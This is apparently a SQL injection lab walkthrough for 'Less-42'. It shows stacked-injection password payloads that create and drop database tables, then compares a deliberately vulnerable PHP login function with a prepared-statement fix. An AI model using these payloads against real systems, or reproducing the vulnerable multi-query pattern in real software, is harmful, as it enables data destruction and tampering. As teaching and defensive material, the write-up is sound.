Less-42
After an update, the data that has passed through mysql_real_escape_string() is stored in the database and does not change. It can come into play when a SELECT is called. So there is no need to consider injecting at the password-update step; this level works differently from the second-order injection idea.
Analysis of the login.php source code for this level:
The password variable is not processed by the mysql_real_escape_string() function when it is received via POST, so the password field of the login form is where the attack can be carried out.
The login username can be anything.
Log in with a password of the following form: c';drop table me# (deletes the table me)
c';create table me like users# (creates the table me)
The following figure shows the tables that exist in the database before we log in.
Log in here with Username: admin
Password: c';create table less42 like users#
The original SQL statement is
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
The SQL statement constructed at logon is
SELECT * FROM users WHERE username='admin' and password='c';create table less42 like users#
Using stacked injection, we successfully executed the statement that created the data table less42.
Running show tables afterwards shows that the less42 table has been successfully created.
Use c';drop table me# as the login password to delete the table.
You can also use this method to update and insert data items, which is not demonstrated here.
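The flaw described above next to its fix, as an added example (not the lab's own login.php). It assumes an open mysqli connection and that the login code sends its query through a multi-statement call such as mysqli_multi_query(), which is what lets a stacked statement execute; the function names are hypothetical.

```php
<?php
// Added example, not the lab's own login.php. Assumes an open mysqli
// connection and the lab's users table; function names are hypothetical.

// Vulnerable pattern: the username is escaped, the password is concatenated
// raw, and a multi-statement call runs whatever follows a ';' in it.
function login_vulnerable(mysqli $con, string $user, string $pass): bool
{
    $username = mysqli_real_escape_string($con, $user);
    $sql = "SELECT * FROM users WHERE username='$username' and password='$pass'";
    if (!mysqli_multi_query($con, $sql)) {
        return false;
    }
    $result = mysqli_store_result($con);        // result of the SELECT
    $ok = $result instanceof mysqli_result && mysqli_num_rows($result) === 1;
    if ($result instanceof mysqli_result) {
        mysqli_free_result($result);
    }
    // Drain the results of any stacked statements so the connection is reusable.
    while (mysqli_more_results($con) && mysqli_next_result($con)) {
        $extra = mysqli_store_result($con);
        if ($extra instanceof mysqli_result) {
            mysqli_free_result($extra);
        }
    }
    return $ok;
}

// Hardened form: both values are bound as data, and a prepared statement
// holds exactly one SQL statement, so nothing after a ';' is ever parsed.
function login_hardened(mysqli $con, string $user, string $pass): bool
{
    $stmt = mysqli_prepare($con, "SELECT 1 FROM users WHERE username = ? AND password = ?");
    if ($stmt === false) {
        return false;
    }
    mysqli_stmt_bind_param($stmt, "ss", $user, $pass);
    mysqli_stmt_execute($stmt);
    mysqli_stmt_store_result($stmt);
    $ok = mysqli_stmt_num_rows($stmt) === 1;
    mysqli_stmt_close($stmt);
    return $ok;
}
```

Escaping the password as well would stop the quote breakout, but binding both parameters and avoiding multi-statement calls removes the stacked-query path entirely.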